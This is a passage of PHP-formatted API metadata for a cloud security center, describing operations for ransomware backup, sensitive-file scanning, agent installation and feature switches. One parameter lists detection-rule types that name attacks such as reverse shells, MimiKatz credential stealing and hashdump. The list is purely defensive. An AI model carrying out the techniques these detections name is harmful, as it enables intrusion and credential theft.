[ 'type' => 'object', 'properties' => [ 'Success' => ['description' => 'Indicates whether the request was successful. Valid values:'."\n" ."\n" .'* **true**: The request was successful.'."\n" .'* **false**: The request failed.'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => '20623245-7E5E-52CA-9640-7502F119****', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'ModifyWebPath', 'summary' => 'Modifies a custom web directory.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyWebPath'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:ModifyWebPath', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Success\\": true,\\n \\"RequestId\\": \\"20623245-7E5E-52CA-9640-7502F119****\\"\\n}","type":"json"}]', ], 'OpenBackupAutoConfig' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'deprecated' => false, 'systemTags' => ['operationType' => 'create', 'riskType' => 'none', 'chargeType' => 'free'], 'parameters' => [ [ 'name' => 'MaxBatchSize', 'in' => 'query', 'schema' => ['description' => 'The number of servers included in a single batch when the anti-ransomware managed service automatically generates policies.'."\n" ."\n" .'> The maximum value is 50. If you specify a value greater than 50, the value is set to 50.', 'type' => 'integer', 'format' => 'int32', 'maximum' => '50', 'minimum' => '1', 'required' => false, 'example' => '20', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'BaseResult', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request. Alibaba Cloud generates a unique identifier for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => 'ADE57832-9666-511C-9A80-B87DE2E8****', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'Enable anti-ransomware managed service configuration', 'summary' => 'Enables the anti-ransomware managed service to configure server backup policies with one click. This operation can be called only after you purchase the anti-ransomware managed service.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'OpenBackupAutoConfig'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:OpenBackupAutoConfig', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"ADE57832-9666-511C-9A80-B87DE2E8****\\"\\n}","type":"json"}]', ], 'OpenSensitiveFileScan' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'none', 'abilityTreeCode' => '156730', 'abilityTreeNodes' => ['FEATUREsasF0IRDR'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'SwitchOn', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The switch operation. Valid values:'."\n" ."\n" .'- **on**: Enable.'."\n" .'- **off**: Disable.', 'type' => 'string', 'required' => false, 'example' => 'on'], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'title' => '', 'description' => 'The response parameters for modifying the sensitive file scan switch.', 'type' => 'object', 'properties' => [ 'Data' => [ 'description' => 'The data returned for modifying the sensitive file scan switch.', 'type' => 'object', 'properties' => [ 'SwitchOn' => ['title' => '', 'description' => 'The switch operation. Valid values:'."\n" ."\n" .'- **on**: Enable.'."\n" .'- **off**: Disable.', 'type' => 'string', 'example' => 'on'], ], 'title' => '', 'example' => '', ], 'Success' => ['description' => 'The result status of the API call. Valid values:'."\n" .'- **true**: The API call was successful.'."\n" .'- **false**: The API call failed.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The result code. A value of **200** indicates success. Any other value indicates failure. You can use this field to determine the cause of the failure.', 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The detailed information of the error code.', 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request. Alibaba Cloud generates a unique identifier for each request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => 'B4A4C081-7F06-5481-9323-02A5419B9423', 'title' => ''], 'HttpStatusCode' => ['description' => 'The HTTP status code.', 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Edit sensitive file scan switch', 'summary' => 'Modifies the sensitive file scan switch.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'OpenSensitiveFileScan'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'none', 'ramAction' => [ 'action' => 'yundun-sas:OpenSensitiveFileScan', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": {\\n \\"SwitchOn\\": \\"on\\"\\n },\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"B4A4C081-7F06-5481-9323-02A5419B9423\\",\\n \\"HttpStatusCode\\": 200\\n}","type":"json"}]', ], 'OperateAgentClientInstall' => [ 'summary' => 'Installs the Security Center agent on servers.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'none', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '92411', 'abilityTreeNodes' => ['FEATUREsasK0Q1Y8'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'InstanceIds', 'in' => 'query', 'schema' => ['description' => 'The IDs of the servers on which you want to install the Security Center agent. Separate multiple IDs with commas (,).'."\n" ."\n" .'> : You must specify at least one of **InstanceIds** and **Uuids**. If you specify **InstanceIds**, you must also specify **Region** and **Os**.'."\n", 'type' => 'string', 'required' => false, 'example' => 'i-uf6j8vq9l4r5ntht****', 'title' => ''], ], [ 'name' => 'Uuids', 'in' => 'query', 'schema' => ['description' => 'The UUIDs of the servers on which you want to install the Security Center agent. Separate multiple UUIDs with commas (,).'."\n" ."\n" .'> You must specify at least one of the **InstanceIds** and **Uuids** parameters before you can call this operation.'."\n", 'type' => 'string', 'required' => false, 'example' => '1587bedb-fdb4-48c4-9330-************', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'* **zh**: Chinese'."\n" .'* **en**: English'."\n", 'type' => 'string', 'required' => false, 'example' => 'en', 'title' => ''], ], [ 'name' => 'Region', 'in' => 'query', 'schema' => ['description' => 'The region where the servers reside. Valid values include the following regions:'."\n" ."\n" .'* cn-hangzhou: China (Hangzhou)'."\n" .'* cn-beijing: China (Beijing)'."\n" .'* cn-shanghai: China (Shanghai)'."\n" .'* cn-zhangjiakou: China (Zhangjiakou)'."\n" .'* cn-shenzhen: China (Shenzhen)'."\n", 'type' => 'string', 'required' => false, 'example' => 'cn-hangzhou', 'title' => ''], ], [ 'name' => 'Os', 'in' => 'query', 'schema' => ['description' => 'The operating system of the servers. Valid values:'."\n" ."\n" .'* **linux**'."\n" .'* **windows**'."\n", 'type' => 'string', 'required' => false, 'example' => 'linux', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => 'AE79B457-877C-51C6-AD72-0D34A025D***', 'title' => ''], 'AegisCelintInstallResposeList' => [ 'description' => 'An array that consists of the returned results.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The details of the returned results.'."\n", 'type' => 'object', 'properties' => [ 'Uuid' => ['description' => 'The UUID of the server.'."\n", 'type' => 'string', 'example' => '1587bedb-fdb4-48c4-9330-****', 'title' => ''], 'InstanceId' => ['description' => 'The ID of the server.'."\n", 'type' => 'string', 'example' => 'i-uf6j8vq9l4r5ntht****', 'title' => ''], 'RecordId' => ['description' => 'The ID of the installation task.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '2856', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'InstallNotGranted', 'errorMessage' => 'The installation permission is not granted.', 'description' => 'Insufficient permissions, please log on to the RAM console to grant AliyunServiceRoleForSas permissions.'], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'InternalError', 'errorMessage' => 'The request processing has failed due to some unknown error.', 'description' => ''], ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"type":"json","example":"{\\n \\"RequestId\\": \\"AE79B457-877C-51C6-AD72-0D34A025D***\\",\\n \\"AegisCelintInstallResposeList\\": [\\n {\\n \\"Uuid\\": \\"1587bedb-fdb4-48c4-9330-****\\",\\n \\"InstanceId\\": \\"i-uf6j8vq9l4r5ntht****\\",\\n \\"RecordId\\": 2856\\n }\\n ]\\n}","errorExample":""},{"type":"xml","example":"\\n AE79B457-877C-51C6-AD72-0D34A025D***\\n \\n 1587bedb-fdb4-48c4-9330-****\\n i-uf6j8vq9l4r5ntht****\\n 2856\\n \\n","errorExample":""}]', 'title' => 'OperateAgentClientInstall', 'requestParamsDescription' => ' ', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'OperateAgentClientInstall'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'none', 'ramAction' => [ 'action' => 'yundun-sas:OperateAgentClientInstall', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'OperateApplication' => [ 'summary' => 'Adds or deletes container applications for tamper proofing.', 'methods' => ['get', 'post'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'deprecated' => false, 'systemTags' => ['operationType' => 'update', 'riskType' => 'none', 'chargeType' => 'free'], 'parameters' => [ [ 'name' => 'RuleId', 'in' => 'query', 'schema' => ['description' => 'The ID of the rule.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '300566', 'title' => ''], ], [ 'name' => 'ContainerWebDefenseApplicationDTOS', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The container application that is protected from being tampered with.'."\n", 'type' => 'array', 'items' => [ 'description' => '', 'type' => 'object', 'properties' => [ 'ClusterId' => ['description' => 'The ID of the cluster to which the container belongs.'."\n" ."\n" .'> You can call the [DescribeGroupedContainerInstances](~~DescribeGroupedContainerInstances~~) operation to query the cluster ID.'."\n", 'type' => 'string', 'required' => true, 'example' => 'ceb68cc58234141828677e383bd21ff0c', 'title' => ''], 'Tag' => ['description' => 'The value of the application tag.'."\n", 'type' => 'string', 'required' => true, 'example' => 'app:app-003', 'title' => ''], 'Flag' => ['description' => 'Specifies whether to apply the configuration to the asset. Valid values:'."\n" ."\n" .'* **add**: applied'."\n" .'* **del**: not applied'."\n", 'type' => 'string', 'required' => true, 'example' => 'add', 'title' => ''], 'Id' => ['description' => 'The application ID. If the application is newly added, you do not need to specify this parameter.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '196', 'title' => ''], ], 'required' => false, 'title' => '', 'example' => '', ], 'required' => true, 'maxItems' => 10, 'minItems' => 1, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => '79B067A4-54EB-5560-B5C8-425ABEDC2784', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'OperateApplication', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'OperateApplication'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:OperateApplication', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"79B067A4-54EB-5560-B5C8-425ABEDC2784\\"\\n}","type":"json"}]', ], 'OperateBucketScanTask' => [ 'summary' => 'Manages an Object Storage Service (OSS) bucket check task.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => ['operationType' => 'update'], 'parameters' => [ [ 'name' => 'BucketName', 'in' => 'query', 'schema' => ['description' => 'The name of the bucket.'."\n", 'type' => 'string', 'required' => false, 'example' => 'iboxpublic****', 'title' => ''], ], [ 'name' => 'OperateCode', 'in' => 'query', 'schema' => ['description' => 'The operation that you want to perform on the bucket. Valid value:'."\n" ."\n" .'* **1**: cancels the bucket check.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => '0C8487EF-50C2-54BB-8634-10F8C35D****', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'OperateBucketScanTask', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'OperateBucketScanTask'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:OperateBucketScanTask', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"0C8487EF-50C2-54BB-8634-10F8C35D****\\"\\n}","type":"json"}]', ], 'OperateCommonOverallConfig' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'update', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '92412', 'abilityTreeNodes' => ['FEATUREsasK0Q1Y8'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address of the request.'."\n", 'type' => 'string', 'required' => false, 'example' => '223.79.XX.XX', 'title' => ''], ], [ 'name' => 'Type', 'in' => 'query', 'schema' => ['description' => 'The type of the feature. Valid values:'."\n" ."\n" .'* **kdump_switch**: Active defense experience optimization'."\n" .'* **threat_detect**: Dynamic adaptive threat detection capability'."\n" .'* **suspicious_aggregation**: Alert Association'."\n" .'* **alidetect**: File Test'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_38857**: Entrance service execution high-risk operation (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_50858**: Web service performs high-risk operations (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_50859**: Entrance service execution suspicious operation (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_50862**: Cloud Assistant Advanced Protection (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_50867**: Create malicious files (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_50868**: Create suspicious files (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_64025**: Ingress service execute command \\[enhanced mode] (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_51229**: Browser service execution a high-risk operation (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_51230**: Entrance service execution suspicious operation (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_51232**: System processes execution high-risk operations (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_51233**: Java service execution high-risk operations (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_51234**: Office components execution high-risk operations (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_51235**: Web service performs high-risk operations (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_52820**: Create malicious files (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_52826**: Entrance service execution high-risk operation (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_55251**: Database services execution high-risk operations (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_63725**: Ingress service implants suspicious script/binary file (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_3277**: Suspicious process startup (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_50983**: obfuscated command (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_51200**: Command line download and run malicious files (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_71131**: Ingress service executes sequence of suspicious behavior (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_51225**: Powershell executes high-risk commands (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_51226**: Powershell execute suspicious command (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_52821**: Suspicious process startup (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_57242**: Malicious command execution (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_57340**: Command line download and run malicious files (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_39659**: Sensitive Registry Key Protection (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_52816**: high-risk account manipulation behavior (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_54365**: Create service autorun item (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_54366**: Create high-risk autorun item (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_54367**: Create scheduled task autorun item (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_54368**: Create registry autorun item (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_54369**: Create WMI autorun item (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_50869**: Unauthorized execution of high-risk orders (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_53272**: Exploiting Kernel Vulnerabilities to Elevate Privileges (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_54395**: Unauthorized reading and writing of sensitive files (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_57897**: suspected privilege escalation (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_52825**: Unauthorized execution of high-risk orders (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_5507**: malicious drivers (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_50876**: Against security software (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_53168**: process debugging (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_54699**: Hijack dynamic link library (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_62981**: Bypassing security monitoring (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_52815**: Load high-risk drivers (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_52823**: Running high-risk ARK tools (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_54373**: Against security software (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_54374**: Intrusion trace cleanup (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_54265**: Hijacking the PAM Module (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_54953**: Hashdump Attack (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_54383**: MimiKatz Credential Stealing (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_54384**: Hashdump Attack (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_50861**: Information detection (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_52818**: Information detection (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_54034**: Intranet scan (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_51228**: High-risk lateral penetration tools (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_50870**: Rebound Shell (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_50873**: WebShell execute command'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_51236**: Rebound Shell (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_50877**: Malicious soft communication (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_50884**: Suspicious worm script behavior (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_50885**: malicious script behavior (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_51201**: ransomware (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_51202**: Suspected Extortion (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_52827**: ransomware (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_52828**: Suspected Extortion (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_52829**: delete system backup behavior (Windows)'."\n", 'type' => 'string', 'required' => true, 'example' => 'kdump_switch', 'title' => ''], ], [ 'name' => 'Config', 'in' => 'query', 'schema' => ['description' => 'Specifies whether to enable or disable the feature. Valid values:'."\n" ."\n" .'* **on**: enable'."\n" .'* **off**: disable'."\n", 'type' => 'string', 'required' => true, 'example' => 'on', 'title' => ''], ], [ 'name' => 'NoTargetAsOn', 'in' => 'query', 'schema' => ['description' => 'Specifies whether to configure assets for the feature. Default value: **false**. Valid values:'."\n" ."\n" .'* **true**'."\n" .'* **false**'."\n" ."\n" .'> This parameter takes effect only when you set **Config** to **on**.'."\n", 'type' => 'boolean', 'required' => false, 'example' => 'true', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => '7E0618A9-D5EF-4220-9471-C42B5E92719F', 'title' => ''], ], 'description' => 'The returned data.', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'OperateCommonOverallConfig', 'summary' => 'Enables or disables a feature by type.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'OperateCommonOverallConfig'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:OperateCommonOverallConfig', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"7E0618A9-D5EF-4220-9471-C42B5E92719F\\"\\n}","type":"json"}]', ], 'OperateCommonTargetConfig' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'update', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '92413', 'abilityTreeNodes' => ['FEATUREsasK0Q1Y8'], ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The IP address of the access source.', 'type' => 'string', 'required' => false, 'example' => '182.92.XXX.XXX', 'title' => ''], ], [ 'name' => 'Type', 'in' => 'query', 'schema' => [ 'description' => 'The switch type. Valid values:'."\n" .'- **alidetect-scan-enable**: local file detection that performs detection only locally.'."\n" .'- **ACTION-TRIAL-PERMISSION**: ActionTrail data delivery.'."\n" .'- **alidetect**: local file detection engine.'."\n" .'- **container\\_prevent\\_escape**: container escape prevention.'."\n" .'- **image_repo**: repository image scanning.'."\n" .'- **proc\\_filter\\_switch**: log filtering.'."\n" .'- **agentless**: agentless detection.'."\n" .'- **rasp**: application protection.'."\n" .'- **sensitiveFile**: sensitive information scanning.'."\n" .'- **aliscriptengine**: deep detection engine.'."\n" .'- **containerNetwork**: container visualization.', 'enumValueTitles' => [], 'type' => 'string', 'required' => true, 'example' => 'alidetect', 'title' => '', ], ], [ 'name' => 'TargetType', 'in' => 'query', 'schema' => [ 'description' => 'The Asset Type of the target. Valid values:'."\n" .'- **uuid**: server UUID.'."\n" .'- **Cluster**: cluster ID.'."\n" .'- **image_repo**: image repository name.', 'enumValueTitles' => [], 'type' => 'string', 'required' => false, 'example' => 'uuid', 'title' => '', ], ], [ 'name' => 'TargetOperations', 'in' => 'query', 'schema' => ['description' => 'The parameters for configuring proactive defense on servers. The following parameters are included:'."\n" ."\n" .'- **targetType**: the dimension of the defense configuration. Currently, only the UUID dimension is supported. Fixed value: **uuid**.'."\n" .'- **target**: the UUID of the server for which you want to configure proactive defense.'."\n" .'- **flag**: specifies whether to enable or disable proactive defense for the server. Valid values: **add** (enable) and **del** (disable).', 'type' => 'string', 'required' => true, 'example' => '['."\n" .' {'."\n" .' "targetType": "uuid",'."\n" .' "target": "f329a044-6a2f-49a0-9d33-352f6c1d****",'."\n" .' "flag": "del"'."\n" .' }'."\n" .']', 'title' => ''], ], [ 'name' => 'FieldName', 'in' => 'query', 'schema' => [ 'description' => 'The target type of the image switch. Valid values:'."\n" .'- **repoName**: repository name.'."\n" .'- **repoNamespace**: repository namespace name.', 'enumValueTitles' => [], 'type' => 'string', 'required' => false, 'example' => 'repoName', 'title' => '', ], ], [ 'name' => 'FieldValue', 'in' => 'query', 'schema' => ['description' => 'The repository name or repository namespace name.', 'type' => 'string', 'required' => false, 'example' => 'cafcmc-dev', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for this request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '95D45C44-4F53-5ED2-8E12-7D134564B****', 'title' => ''], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Configure general switch for feature module', 'summary' => 'Configures the general switch for a feature module by type, including image scanning, 